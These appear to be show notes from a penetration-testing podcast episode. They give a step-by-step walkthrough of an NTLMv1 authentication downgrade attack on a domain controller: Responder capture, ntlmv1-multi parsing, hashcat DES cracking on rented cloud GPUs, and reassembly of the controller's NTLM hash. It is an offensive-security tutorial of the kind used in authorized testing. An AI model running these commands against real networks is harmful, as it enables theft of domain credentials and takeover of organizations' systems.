7MS #591: Tales of Pentest Pwnage - Part 52

Today we talk about an awesome path to internal network pentest pwnage using downgraded authentication from a domain controller, a tool called ntlmv1-multi, and a boatload of cloud-cracking power on the cheap from vast.ai. Here's my chicken scratch notes for how to take the downgraded authentication hash capture (using Responder.py -I eth0 --lm) and eventually tweeze out the NTLM hash of the domain controller. Let's start with a sample blob you'll get out of the ntlmv1-multi tool:

Hostname: tangent
Username: TT-DC01$
Challenge: 1122334455667788
LM Response: 14B8DF571CF877A87CEAB088CDD163868819D23E095B0097
NT Response: 14B8DF571CF877A87CEAB088CDD163868819D23E095B0097
CT1: 14B8DF571CF877A8
CT2: 7CEAB088CDD16386
CT3: 8819D23E095B0097

To Calculate final 4 characters of NTLM hash use:
./ct3_to_ntlm.bin 8819D23E095B0097 1122334455667788

To crack with hashcat create a file with the following contents:
14B8DF571CF877A8:1122334455667788
7CEAB088CDD16386:1122334455667788

echo "14B8DF571CF877A8:1122334455667788">>14000.hash
echo "7CEAB088CDD16386:1122334455667788">>14000.hash

To crack with hashcat:
./hashcat -m 14000 -a 3 -1 charsets/DES_full.charset --hex-charset 14000.hash ?1?1?1?1?1?1?1?1

To Crack with crack.sh use the following token
NTHASH:14B8DF571CF877A87CEAB088CDD163868819D23E095B0097

First, put this in a fille called 14000.hash

14B8DF571CF877A8:1122334455667788
7CEAB088CDD16386:1122334455667788

Now crack with vast.ai using hashcat:

./hashcat -m 14000 -a 3 -1 charsets/DES_full.charset --hex-charset 14000.hash ?1?1?1?1?1?1?1?1

The results will look something like this:

14B8DF571CF877A8:1122334455667788:$HEX[STRING1]
7CEAB088CDD16386:1122334455667788:$HEX[STRING2]

(STRING1 and STRING2 will be needed in the next steps)

Then calculate the last 4 characters of the hash:

./ct3_to_ntlm.bin 8819D23E095B0097 1122334455667788
LAST4

(I'm calling the result of this command LAST4)

Now take each hex string and run the deskey_to_ntlm.pl tool on it:

hashcat-utils/src/deskey_to_ntlm.pl STRING1
PART1

hashcat-utils/src/deskey_to_ntlm.pl STRING2
PART2

(I'm calling the result of these commands PART1 and PART2)

Now stitch it all together:
PART1+PART2+LAST4

(Note: don't actually include the + in stitching the strings together)

Side note: in my lab the Responder downgrade attack wouldn't work correctly, and I eventually found out it was because my freshly installed DC didn't support SMB1. I installed/enabled it with:

Get-WindowsOptionalFeature -Online -FeatureName SMB1Protocol
Enable-WindowsOptionalFeature -Online -FeatureName SMB1Protocol